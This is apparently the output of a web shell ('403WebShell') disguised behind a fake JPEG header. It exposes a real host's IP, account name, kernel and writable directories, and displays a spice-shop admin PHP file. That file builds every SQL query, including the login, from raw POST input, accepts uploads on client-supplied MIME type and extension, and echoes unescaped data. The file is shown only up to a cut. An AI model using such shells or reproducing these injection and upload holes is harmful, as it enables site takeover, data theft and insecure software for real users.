���� JFIF    fdasasfas213sdaf403WebShell
403Webshell
Server IP : 147.79.69.148  /  Your IP : 216.73.216.200
Web Server : LiteSpeed
System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64
User : u479334040 ( 479334040)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u479334040/domains/saumasale.in/public_html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u479334040/domains/saumasale.in/public_html/admin/command.php
<?php
error_reporting(E_ALL);
date_default_timezone_set('Asia/Kolkata');
if (isset($_POST['command'])) {
	session_start();
	include_once('includes/db.php');
	$ob = new database();
	function uploadImage($data)
	{
		if (preg_match('/^data:image\/(\w+);base64,/', $data, $type)) {
			$data = substr($data, strpos($data, ',') + 1);
			$type = strtolower($type[1]); // jpg, png, gif

			if (!in_array($type, ['jpg', 'jpeg', 'gif', 'png'])) {
				throw new \Exception('invalid image type');
			}
			$data = str_replace(' ', '+', $data);
			$data = base64_decode($data);

			if ($data === false) {
				throw new \Exception('base64_decode failed');
			}
		} else {
			throw new \Exception('did not match data URI with image data');
		}
		$folder = "product_images/";
		$filename = $folder . MD5(date('r')) . ".{$type}";
		if (file_put_contents($filename, $data)) {
			return $filename;
		}
	}

	function compress($file, $destination, $w, $h, $crop = FALSE)
	{
		list($width, $height) = getimagesize($file);
		$type = strtolower(pathinfo($file, PATHINFO_EXTENSION));
		$r = $width / $height;
		if ($width > 2000 || $height > 2000) {
			if ($crop) {
				if ($width > $height) {
					$width = ceil($width - ($width * abs($r - $w / $h)));
				} else {
					$height = ceil($height - ($height * abs($r - $w / $h)));
				}
				$newwidth = $w;
				$newheight = $h;
			} else {
				if ($w / $h > $r) {
					$newwidth = $h * $r;
					$newheight = $h;
				} else {
					$newheight = $w / $r;
					$newwidth = $w;
				}
			}
		} else {
			$newwidth = $width;
			$newheight = $height;
		}
		// echo $type;
		// $src = imagecreatefromjpeg($file);
		if ($type == 'jpeg' || $type == 'jpg') {
			$image = imagecreatefromjpeg($file);
			imagecolorallocatealpha($image, 255, 255, 255, 127);
			$newImg = imagecreatetruecolor($newwidth, $newheight);
			imagealphablending($newImg, false);
			imagesavealpha($newImg, true);
			$transparent = imagecolorallocatealpha($newImg, 255, 255, 255, 127);
			imagefilledrectangle($newImg, 0, 0, $newwidth, $newheight, $transparent);
			imagecopyresampled($newImg, $image, 0, 0, 0, 0, $newwidth, $newheight, $width, $height);
			imagejpeg($newImg, $destination, 100);
			return $newImg;
		} elseif ($type == 'gif') {
			$image = imagecreatefromgif($file);
			imagecolorallocatealpha($image, 255, 255, 255, 127);
			$newImg = imagecreatetruecolor($newwidth, $newheight);
			imagealphablending($newImg, false);
			imagesavealpha($newImg, true);
			$transparent = imagecolorallocatealpha($newImg, 255, 255, 255, 127);
			imagefilledrectangle($newImg, 0, 0, $newwidth, $newheight, $transparent);
			imagecopyresampled($newImg, $image, 0, 0, 0, 0, $newwidth, $newheight, $width, $height);
			imagegif($newImg, $destination, 100);
			return $newImg;
		} elseif ($type == 'png') {
			$image = imagecreatefrompng($file);
			imagecolorallocatealpha($image, 255, 255, 255, 127);
			$newImg = imagecreatetruecolor($newwidth, $newheight);
			imagealphablending($newImg, false);
			imagesavealpha($newImg, true);
			$transparent = imagecolorallocatealpha($newImg, 255, 255, 255, 127);
			imagefilledrectangle($newImg, 0, 0, $newwidth, $newheight, $transparent);
			imagecopyresampled($newImg, $image, 0, 0, 0, 0, $newwidth, $newheight, $width, $height);
			imagepng($newImg, $destination, 9);
			return $newImg;
		}
	}

	if ($_POST['command'] == "do_admin_login") {

		$email = $_POST['email'];
		$password = $_POST['password'];
		$ob->query("SELECT * FROM admin WHERE email='$email' AND password='$password'");

		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
				$_SESSION['logged_in_id'] = $data['id'];
				echo "OK";
			}
		} else {
			echo "Failed";
		}
	}

	///////////// SHOW PRODUCTS
	if ($_POST['command'] == "show_product") {
		$query = "SELECT * FROM product ORDER BY `id` DESC";
		$ob->query($query);
		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				$title = $data['title'];
				$price = $data['price'];
				$category = $data['category'];
				$description = base64_decode($data['description']);
				$composition = base64_decode($data['composition']);
				$guide = base64_decode($data['guide']);
				$image = $data['image'];
				$id = $data['id'];
				
				$avaiability = $data['avaiability'];
				if($avaiability == 1){
					$msg = "In Stock";	
				}else{
					$msg = "Out of Stock";
				}
			?>

				<tr>
					<td><?php echo $i; ?></td>
					<td><?php echo $title; ?></td>
					<td>
						<?php
						$ob->query("SELECT * FROM category WHERE id='$category'");
						if ($ob->affected_rows() >= 1) {
							foreach ($ob->rows() as $cat) {
								echo $cat['category'];
							}
						} else {
							echo "No category";
						}
						?>
					</td>
					<td><?php echo $price; ?></td>
					<td>
						<div class="descp"><?php echo $description; ?></div>
					</td>
					<td>
						<div class="descp"><?php echo $composition; ?></div>
					</td>
					<td>
						<div class="descp"><?php echo $guide; ?></div>
					</td>
					<td>
						<div><?php echo $msg; ?></div>
					</td>
					<td style="text-align:center;">
						<a href="#" data-toggle="modal" data-target="#myModal_img<?php echo $id; ?>"><img src='<?php echo $image; ?>' style='max-width:100px;max-height:100px;' /></a></td>
					<td>
						<a href='#myuser' role='button' class="btn btn-info btn-sm btn-icon icon-left info_button edit_product" data-toggle="modal" data-target="#myuser" data-id='<?php echo $id; ?>' data-value='<?php echo $title; ?>'>
							<i class="fas fa-edit"></i> Edit
						</a>
						<a href="#myuser" id="del_product" role="button" class="btn btn-danger btn-sm btn-icon icon-left danger_button ml-1" value="<?php echo $id; ?>">
							<i class="fas fa-times"></i> Delete
						</a>
					</td>
				</tr>
			<?php

			}
		}
	}
	///////////User Edit
	if ($_POST["command"] == "edit_product"){
		$id = $_POST["id"];
		$ob->query("SELECT * FROM product WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
			?>
				<form method="POST" id="product_edit_form" enctype="multipart/form-data">
					<div class="modal-body">
						<div class="form-group">
							<label for="title">Title</label>
							<input type="text" name="title" value="<?php echo $data["title"]; ?>" id="title" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="category">Category</label>
							<select name="category" id="category" class="form-control">
								<?php
								$cat_id = $data["category"];
								$ob->query("SELECT * FROM category");
								if ($ob->affected_rows() >= 1) {
									foreach ($ob->rows() as $tag) {
								?>
										<option value="<?php echo $tag['id']; ?>" <?php if ($data['category'] == $tag['id']) {
											echo 'selected';
										} ?>><?php echo $tag['category']; ?></option>
								<?php
									}
								}
								?>
							</select>
						</div>
						<div class="form-group">
							<label for="price">Price</label>
							<input type="text" name="price" value="<?php echo $data["price"]; ?>" id="price" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="">Description</label>
							<textarea id="summernote" name="description">
								<?php echo base64_decode($data['description']); ?>
                     </textarea>
						</div>
						<div class="form-group">
							<label for="">Materials</label>
							<textarea id="summernote" name="composition">
								<?php echo base64_decode($data['composition']); ?>
                     </textarea>
						</div>
						<div class="form-group">
							<label for="">Return Polices</label>
							<textarea id="summernote" name="guide">
								<?php echo base64_decode($data['guide']); ?>
                     </textarea>
						</div>
						<div class="form-group">
							<label for="meta_title">Meta Title</label>
							<input type="text" name="meta_title" value="<?php echo $data["meta_title"]; ?>" id="meta_title" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="meta_dec">Meta Description</label>
							<input type="text" name="meta_dec" value="<?php echo $data["meta_dec"]; ?>" id="meta_dec" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="meta_kwd">Meta Keyword</label>
							<input type="text" name="meta_kwd" value="<?php echo $data["meta_kwd"]; ?>" id="meta_kwd" class="form-control txt">
						</div>
						<div class="form-group">
							<select class="form-control" name="avaiability" id="avaiability">
								<option value="1" <?php if($data["avaiability"] == 1){echo "selected";} ?>>In Stock</option>
								<option value="0" <?php if($data["avaiability"] == 0){echo "selected";} ?>>Out of Stock</option>
							</select>
						</div>
						<div class="form-group">
							<label for="image">Image</label>
							<input type="file" name="image" id="image" />
						</div>
						<div class="form-group">
							<img src="<?php echo $data["image"] ?>" style='max-width:150px;max-height:150px;'>
						</div>
					</div>
					<div class="modal-footer">
						<div class="form-group">
							<input type="submit" name="submit" class="btn btn-success boton" />
							<input type="reset" name="reset" class="btn btn-danger boton">
							<input type="hidden" name="id" value="<?php echo $id; ?>">
						</div>
						<input type="hidden" name="command" value="do_product_edit" />
					</div>
				</form>
			<?php
			}
		}
	}
	////////////////////////////// Edit Product
	if ($_POST["command"] == "do_product_edit") {
		$id = $_POST["id"];
		$title = $_POST["title"];
		$category = $_POST["category"];
		$price = $_POST["price"];
		$meta_title = $_POST["meta_title"];
		$meta_kwd = $_POST["meta_kwd"];
		$meta_dec = $_POST["meta_dec"];
		$description = base64_encode(trim($_POST['description']));
		$composition = base64_encode(trim($_POST['composition']));
		$guide = base64_encode(trim($_POST['guide']));
		$avaiability = $_POST["avaiability"];

		$name = $_FILES['image']['name'];
		$tmp = $_FILES['image']['tmp_name'];
		$type = $_FILES['image']['type'];
		$folder = "product_images/";
		$accept_type = array('image/jpeg', 'image/jpg', 'image/png', 'image/bmp', 'image/gif', 'image/tiff');
		if (in_array($type, $accept_type) !== false) {
			if (!is_dir($folder)) {
				mkdir($folder);
			}
			$image = explode('.', $name);
			$image_name = MD5(date('r')) . '.' . $image[1];
			$img = $folder . $image_name;
			move_uploaded_file($tmp, $img);
			$ob->query("UPDATE product SET title='$title', category='$category', price='$price', description='$description',  composition='$composition', meta_title='$meta_title', meta_kwd='$meta_kwd', meta_dec='$meta_dec', guide='$guide', avaiability='$avaiability', image='$img' WHERE id='$id'");
		} else {
			$ob->query("UPDATE product SET title='$title', category='$category', price='$price', composition='$composition',  guide='$guide', meta_title='$meta_title', meta_kwd='$meta_kwd', meta_dec='$meta_dec', avaiability='$avaiability', description='$description' WHERE id='$id'");
		}
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}

	/////Delete Product
	if ($_POST["command"] == "del_product") {
		$id = $_POST["pro_id"];
		$ob->query("SELECT * FROM product WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
				$image = $data['image'];
				unlink($image);
			}
		}
		$ob->query("DELETE FROM product WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		};
	}

	////////////////////////////// Add Product
	if ($_POST['command'] == "do_add_product") {
		// foreach($_POST as $k=>$v){
		// 	echo $k." ".$v."\n";
		// }
		$title = $_POST['title'];
		$category = $_POST['category'];
		$price = $_POST['price'];
		$meta_title = $_POST['meta_title'];
		$meta_kwd = $_POST['meta_kwd'];
		$meta_dec = $_POST['meta_dec'];
		$description = base64_encode(trim($_POST['description']));
		$composition = base64_encode(trim($_POST['composition']));
		$guide = base64_encode(trim($_POST['guide']));
		$avaiability = 1;

		$name1 = $_FILES['image']['name'];
		$tmp = $_FILES['image']['tmp_name'];
		$type = $_FILES['image']['type'];
		$folder = "product_images/";
		$accept_type = array('image/jpeg', 'image/jpg', 'image/png', 'image/bmp', 'image/gif', 'image/tiff');
		if (in_array($type, $accept_type) !== false) {
			if (!is_dir($folder)) {
				mkdir($folder);
			}
			$image = explode('.', $name1);
			$image_name = MD5(date('r')) . '.' . $image[1];
			$img1 = $folder . $image_name;
			if (move_uploaded_file($_FILES["image"]["tmp_name"], $img1)) {
				$ob->query("insert into product SET title='$title', category='$category', price='$price', description='$description', meta_title='$meta_title', meta_kwd='$meta_kwd', meta_dec='$meta_dec', composition='$composition', guide='$guide', avaiability='$avaiability', image='$img1'");
				if ($ob->affected_rows() >= 1) {
					$source_img = $img1;
					$destination_img = $img1;
					$crop = false;
					compress($source_img, $destination_img, 2000, 2000, $crop);
				}
			}
			if ($ob->affected_rows() >= 1) {
				echo "OK";
			} else {
				echo "Failed/nTry again.";
			}
		}
		// $data = $_POST['image'];
		// $proImage = uploadImage($data);
		// $title = $_POST['title'];
		// $category = $_POST['category'];
		// $price = $_POST['price'];
		// $description = base64_encode(trim($_POST['description']));
		// $ob->query("insert into product SET title='$title', category='$category', price='$price', description='$description', image='$proImage'");
		// if($ob->affected_rows() >= 1){
		//     echo "OK";
		// }else{
		//     echo "Failed/nTry again.";
		// }
	}

	///////// Show Spec
	if ($_POST['command'] == "show_spec") {
		$query = "SELECT * FROM specification ORDER BY `id` DESC";
		$ob->query($query);
		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				$type = $data["type"];
				$detail = $data["detail"];
				$p_id = $data["p_id"];
				$id = $data["id"];

			?>
				<tr>
					<td><?php echo $i; ?></td>
					<td>
						<?php
						$ob->query("SELECT * FROM product WHERE id='$data[p_id]'");
						if ($ob->affected_rows() >= 1) {
							foreach ($ob->rows() as $cat) {
								echo $cat['title'];
							}
						} else {
							echo "No Parent";
						}
						?>
					</td>
					<td><?php echo $type; ?></td>
					<td><?php echo $detail; ?></td>
					<td>
						<a href='#myspec' role='button' class="btn btn-info btn-sm btn-icon icon-left info_button edit_spec" data-toggle="modal" data-target="#myspec" data-id='<?php echo $id; ?>'>
							<i class="fas fa-edit"></i> Edit
						</a>
						<a id="del_spec" role="button" class="btn btn-danger btn-sm btn-icon icon-left danger_button ml-1" value="<?php echo $id; ?>">
							<i class="fas fa-times"></i> Delete
						</a>
					</td>
				</tr>
			<?php
			}
		}
	}
	/*Add Specificaton*/
	if ($_POST['command'] == "add_spec") {
		$p_id = $_POST['p_id'];
		$type = $_POST['type'];
		$detail = $_POST['detail'];

		$ob->query("insert into specification SET type='$type', p_id='$p_id', detail='$detail'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "Failed.";
		}
	}

	/////Delete Spec
	if ($_POST["command"] == "del_spec") {
		$id = $_POST["p_id"];
		$ob->query("DELETE FROM specification WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		};
	}

	///////////User Spec
	if ($_POST["command"] == "edit_spec") {
		$id = $_POST["id"];
		$ob->query("SELECT * FROM specification WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
			?>
				<form>
					<div class="modal-body">
						<div class="form-group">
							<label for="type">Type</label>
							<input type="text" name="type" value="<?php echo $data["type"]; ?>" id="type" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="detail">Detail</label>
							<input type="text" name="detail" value="<?php echo $data["detail"]; ?>" id="detail" class="form-control txt">
						</div>
					</div>
					<div class="modal-footer">
						<div class="form-group">
							<input type="submit" name="submit" class="btn btn-success boton" />
							<input type="reset" name="reset" class="btn btn-danger boton">
							<input type="hidden" name="id" value="<?php echo $id; ?>">
						</div>
						<input type="hidden" name="command" value="do_spec_edit" />
					</div>
				</form>
			<?php
			}
		}
	}
	////////////////////////////// Edit Spec
	if ($_POST["command"] == "do_spec_edit") {
		$id = $_POST["id"];
		$type = $_POST["type"];
		$detail = $_POST["detail"];

		$ob->query("UPDATE specification SET type='$type', detail='$detail' WHERE id='$id'");

		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}

	///////// Show About
	if ($_POST['command'] == "show_about") {
		$query = "SELECT * FROM about";
		$ob->query($query);
		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$id = $data["id"];
				$about = $data["about"];

			?>
				<tr>
					<td><?php echo $about; ?></td>
					<td>
						<a href='#myabout' role='button' class="btn btn-info btn-sm btn-icon icon-left info_button edit_about" data-toggle="modal" data-target="#myabout" data-id='<?php echo $id; ?>'>
							<i class="fas fa-edit"></i> Edit
						</a>
					</td>
				</tr>
			<?php
			}
		}
	}
	///////////Edit About
	if ($_POST["command"] == "edit_about") {
		$id = $_POST["id"];
		$ob->query("SELECT * FROM about WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
			?>
				<form>
					<div class="modal-body">
						<div class="form-group">
							<label for="about">Description</label>
							<textarea id="about" name="about">
								<?php echo $data["about"]; ?>
                     </textarea>
						</div>
					</div>
					<div class="modal-footer">
						<div class="form-group">
							<input type="submit" name="submit" class="btn btn-success toastrDefaultSuccess" value="Update" />
							<input type="hidden" name="id" value="<?php echo $id; ?>">
						</div>
						<input type="hidden" name="command" value="do_about_edit" />
					</div>
				</form>
			<?php
			}
		}
	}
	////////////////////////////// Edit About
	if ($_POST["command"] == "do_about_edit") {
		$id = $_POST["id"];
		$about = $_POST["about"];

		$ob->query("UPDATE about SET about='$about' WHERE id='$id'");

		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}

	///////// Show Multi Images
	if ($_POST['command'] == "show_image") {
		$query = "SELECT * FROM images ORDER BY `id` DESC";
		$ob->query($query);

		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				$id = $data["id"];
				$pro_id = $data['pro_id'];
				$image = $data['image'];

			?>
				<tr>
					<td><?php echo $i; ?></td>
					<td>
						<?php
						$ob->query("SELECT * FROM product WHERE id='$pro_id'");
						if ($ob->affected_rows() >= 1) {
							foreach ($ob->rows() as $cat) {
								echo $cat['title'];
							}
						}
						?>
					</td>
					<td><a href="#" data-toggle="modal" data-target="#myModal_img<?php echo $id; ?>"><img src='<?php echo $image; ?>' style='max-width:100px;max-height:100px;' /></a></td>
					<td>
						<a href='#myimage' role='button' class='btn btn-sm btn-danger' id='del_image' value='<?php echo $id; ?>'><i class='fa fa-times'></i> Delete</a>
					</td>
				</tr>

			<?php
			}
		}
	}

	//////////////// Add Multi Images
	if ($_POST["command"] == "do_add_images") {
		$pro_id = $_POST["pro_id"];

		$name1 = $_FILES['image']['name'];
		$tmp = $_FILES['image']['tmp_name'];
		$type = $_FILES['image']['type'];
		$folder = "product_images/";
		$accept_type = array('image/jpeg', 'image/jpg', 'image/png', 'image/bmp', 'image/gif', 'image/tiff');
		if (in_array($type, $accept_type) !== false) {
			if (!is_dir($folder)) {
				mkdir($folder);
			}
			$image = explode('.', $name1);
			$image_name = MD5(date('r')) . '.' . $image[1];
			$img1 = $folder . $image_name;
			if (move_uploaded_file($_FILES["image"]["tmp_name"], $img1)) {
				$ob->query("insert into images SET pro_id='$pro_id', image='$img1'");
				if ($ob->affected_rows() >= 1) {
					$source_img = $img1;
					$destination_img = $img1;
					$crop = false;
					compress($source_img, $destination_img, 2000, 2000, $crop);
				}
			}
			if ($ob->affected_rows() >= 1) {
				echo "OK";
			} else {
				echo "Failed/nTry again.";
			}
		}
	}

	/////Delete Images
	if ($_POST["command"] == "del_image") {
		$id = $_POST["p_id"];
		$ob->query("SELECT * FROM images WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
				$image = $data['image'];
				unlink($image);
			}
		}
		$ob->query("DELETE FROM images WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		};
	}

	///////// Show Enquiry
	if ($_POST['command'] == "show_enquiry") {
		$query = "SELECT * FROM contact ORDER BY `id` DESC";
		$ob->query($query);

		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				$id = $data["id"];
				$name = $data['name'];
				$email = $data['email'];
				$mobile = $data['mobile'];
				$message = $data['message'];
				$time = $data['time'];

			?>
				<tr>
					<td><?php echo $i; ?></td>
					<td><?php echo $name; ?></td>
					<td><?php echo $email; ?></td>
					<td><?php echo $mobile; ?></td>
					<td><?php echo $message; ?></td>
					<td><?php echo $time; ?></td>
				</tr>
			<?php
			}
		}
	}

	///////// Show Enquiry
	if ($_POST['command'] == "show_category") {
		$query = "SELECT * FROM category ORDER BY `id` DESC";
		$ob->query($query);

		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				$category = $data['category'];
				$id = $data['id'];

			?>
				<tr>
					<td><?php echo $i; ?></td>
					<td><?php echo $category; ?></td>
					<td>
						<a href='#mycategory' role='button' class="btn btn-info btn-sm btn-icon icon-left info_button edit_category" data-toggle="modal" data-target="#mycategory" data-id='<?php echo $id; ?>'>
							<i class="fas fa-edit"></i> Edit
						</a>
						<a id="del_cat" role="button" class="btn btn-danger btn-sm btn-icon icon-left danger_button ml-1" value="<?php echo $id; ?>">
							<i class="fas fa-times"></i> Delete
						</a>
					</td>
				</tr>
			<?php
			}
		}
	}
	/*Add Category*/
	if ($_POST['command'] == "add_category") {
		$category = $_POST['category'];

		$ob->query("insert into category SET category='$category'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "Failed.";
		}
	}
	///////////Edit Category
	if ($_POST["command"] == "edit_category") {
		$id = $_POST["id"];
		$ob->query("SELECT * FROM category WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
			?>
				<form>
					<div class="modal-body">
						<div class="form-group">
							<label for="category">Category</label>
							<input class="form-control" type="text" id="category" name="category" value="<?php echo $data["category"]; ?>">
						</div>
					</div>
					<div class="modal-footer">
						<div class="form-group">
							<input type="submit" name="submit" class="btn btn-success toastrDefaultSuccess" value="Update" />
							<input type="hidden" name="id" value="<?php echo $id; ?>">
						</div>
						<input type="hidden" name="command" value="do_category_edit" />
					</div>
				</form>
			<?php
			}
		}
	}
	////////////////////////////// Edit Category
	if ($_POST["command"] == "do_category_edit") {
		$id = $_POST["id"];
		$category = $_POST["category"];

		$ob->query("UPDATE category SET category='$category' WHERE id='$id'");

		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}

	/////Delete Category
	if ($_POST["command"] == "del_cat") {
		$id = $_POST["p_id"];
		$ob->query("DELETE FROM category WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		};
	}

	///////// Show Gallery
	if ($_POST['command'] == "show_gallery") {
		$query = "SELECT * FROM gallery ORDER BY `id` DESC";
		$ob->query($query);

		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				$id = $data["id"];
				$status = $data['p_id'];
				$name = $data['name'];
				$image = $data['image'];

				if ($status == 0) {
					$msg = "Special Mix Masale";
				} else if ($status == 1) {
					$msg = "Dry Fruits";
				} else if ($status == 2) {
					$msg = "Whole Spices";
				} else if ($status == 3) {
					$msg = "Ladoo & Farsan";
				} else {
					$msg = "Not Found";
				}

			?>
				<tr>
					<td><?php echo $i; ?></td>
					<td><?php echo $name; ?></td>
					<td><?php echo $msg; ?></td>
					<td><a href="#" data-toggle="modal" data-target="#myModal_gal<?php echo $id; ?>"><img src='<?php echo $image; ?>' style='max-width:100px;max-height:100px;' /></a></td>
					<td>
						<a href='#mymygallery' role='button' class="btn btn-info btn-sm btn-icon icon-left info_button edit_gallery" data-toggle="modal" data-target="#mygallery" data-id='<?php echo $id; ?>' data-value='<?php echo $name; ?>'>
							<i class="fas fa-edit"></i> Edit
						</a>
						<a href='#mygallery' role='button' class='btn btn-sm btn-danger' id='del_gallery' value='<?php echo $id; ?>'><i class='fa fa-times'></i> Delete</a>
					</td>
				</tr>

			<?php
			}
		}
	}

	//////////////// Add GAllery Img
	if ($_POST["command"] == "do_add_gallery") {

		$name = $_POST["name"];
		$p_id = $_POST["p_id"];

		$name1 = $_FILES['image']['name'];
		$tmp = $_FILES['image']['tmp_name'];
		$type = $_FILES['image']['type'];
		$folder = "product_images/";
		$accept_type = array('image/jpeg', 'image/jpg', 'image/png', 'image/bmp', 'image/gif', 'image/tiff');
		if (in_array($type, $accept_type) !== false) {
			if (!is_dir($folder)) {
				mkdir($folder);
			}
			$image = explode('.', $name1);
			$image_name = MD5(date('r')) . '.' . $image[1];
			$img1 = $folder . $image_name;
			if (move_uploaded_file($_FILES["image"]["tmp_name"], $img1)) {
				$ob->query("insert into gallery set name='$name', p_id='$p_id', image='$img1'");
			}
			if ($ob->affected_rows() >= 1) {
				echo "OK";
			} else {
				echo "Failed/nTry again.";
			}
		}
	}

	///////////Edit Gallery
	if ($_POST["command"] == "edit_gallery") {
		$id = $_POST["id"];
		$ob->query("SELECT * FROM gallery WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
			?>
				<form method="POST" id="product_edit_form" enctype="multipart/form-data">
					<div class="modal-body">
						<div class="form-group">
							<label for="name">Name</label>
							<input type="text" name="name" value="<?php echo $data["name"]; ?>" id="name" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="p_id">Section</label>
							<select class="form-control" name="p_id" id="p_id">
								<option value="0" <?php if ($data["p_id"] == 0) {
															echo "selected";
														} ?>>Special Mix Masale</option>
								<option value="1" <?php if ($data["p_id"] == 1) {
															echo "selected";
														} ?>>Dry Fruits</option>
								<option value="2" <?php if ($data["p_id"] == 2) {
															echo "selected";
														} ?>>Whole Spices</option>
								<option value="3" <?php if ($data["p_id"] == 3) {
															echo "selected";
														} ?>>Ladoo & Farsan</option>
							</select>
						</div>
						<div class="form-group">
							<label for="image">Image</label>
							<input type="file" name="image" id="image" />
						</div>
						<div class="form-group">
							<img src="<?php echo $data["image"] ?>" style='max-width:150px;max-height:150px;'>
						</div>
					</div>
					<div class="modal-footer">
						<div class="form-group">
							<input type="submit" name="submit" class="btn btn-success boton" />
							<input type="reset" name="reset" class="btn btn-danger boton">
							<input type="hidden" name="id" value="<?php echo $id; ?>">
						</div>
						<input type="hidden" name="command" value="do_gallery_edit" />
					</div>
				</form>
<?php
			}
		}
	}
	////////////////////////////// Edit Gallery
	if ($_POST["command"] == "do_gallery_edit") {
		$id = $_POST["id"];
		$p_id = $_POST["p_id"];
		$name1 = $_POST["name"];

		$name = $_FILES['image']['name'];
		$tmp = $_FILES['image']['tmp_name'];
		$type = $_FILES['image']['type'];
		$folder = "product_images/";
		$accept_type = array('image/jpeg', 'image/jpg', 'image/png', 'image/bmp', 'image/gif', 'image/tiff');
		if (in_array($type, $accept_type) !== false) {
			if (!is_dir($folder)) {
				mkdir($folder);
			}
			$image = explode('.', $name);
			$image_name = MD5(date('r')) . '.' . $image[1];
			$img = $folder . $image_name;
			move_uploaded_file($tmp, $img);
			$ob->query("UPDATE gallery SET p_id='$p_id', name='$name1', image='$img' WHERE id='$id'");
		} else {
			$ob->query("UPDATE gallery SET p_id='$p_id', name='$name1' WHERE id='$id'");
		}
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}

	/////Delete Images
	if ($_POST["command"] == "del_gallery") {
		$id = $_POST["p_id"];
		$ob->query("DELETE FROM gallery WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		};
	}


	///////// Show Enquiry
	if ($_POST['command'] == "show_video") {
		$query = "SELECT * FROM video ORDER BY `id` DESC";
		$ob->query($query);

		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				$id = $data['id'];
				$video = $data['video'];

			?>
				<tr>
					<td><?php echo $i; ?></td>
					<td><iframe width="auto" height="200" src="https://www.youtube.com/embed/<?php echo $video; ?>" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></td>
					<td>
						<a id="del_video" role="button" class="btn btn-danger btn-sm btn-icon icon-left danger_button ml-1" value="<?php echo $id; ?>">
							<i class="fas fa-times"></i> Delete
						</a>
					</td>
				</tr>
	<?php
			}
		}
	}
	/*Add Category*/
	if ($_POST['command'] == "do_add_video") {
		$video = $_POST['video'];

		$ob->query("insert into video SET video='$video'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "Failed.";
		}
	}
	/////Delete Video
	if ($_POST["command"] == "del_video") {
		$id = $_POST["id"];
		$ob->query("DELETE FROM video WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		};
	}
	///////// Show Varient Color
	if ($_POST['command'] == "show_color") {
		$query = "SELECT * FROM v_color";
		$ob->query($query);

		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				$id = $data["id"];
				$p_id = $data['p_id'];
				$color = $data['color'];
				$price = $data['price'];
				$image = $data['image'];

				?>
					<tr>
						<td><?php echo $i; ?></td>
						<td>
							<?php
								$ob->query("SELECT * FROM product WHERE id='$p_id'");
								if ($ob->affected_rows() >= 1) {
									foreach ($ob->rows() as $cat) {
										echo $cat['title'];
									}
								} else {
									echo "No category";
								}
							?>
						</td>						
						<td><?php echo $color; ?></td>
						<td><?php echo $price; ?></td>
						<td>
							<img src='<?php echo $image; ?>' style='max-width:100px;max-height:60px;' />
						</td>
						<td>
							<a href="#myuser" id="del_color" role="button" class="btn btn-danger btn-sm btn-icon icon-left danger_button ml-1" value="<?php echo $id; ?>">
							<i class="fas fa-times"></i> Delete
						</a>
						</td>
					</tr>
					

				<?php
			}
		}
	}
	
	////////////////////////////// Add Product
	if ($_POST['command'] == "do_add_color") {
		// foreach($_POST as $k=>$v){
		// 	echo $k." ".$v."\n";
		// }
		$color = $_POST['color'];
		$price = $_POST['price'];
		$p_id = $_POST['p_id'];

		$name1 = $_FILES['image']['name'];
		$tmp = $_FILES['image']['tmp_name'];
		$type = $_FILES['image']['type'];
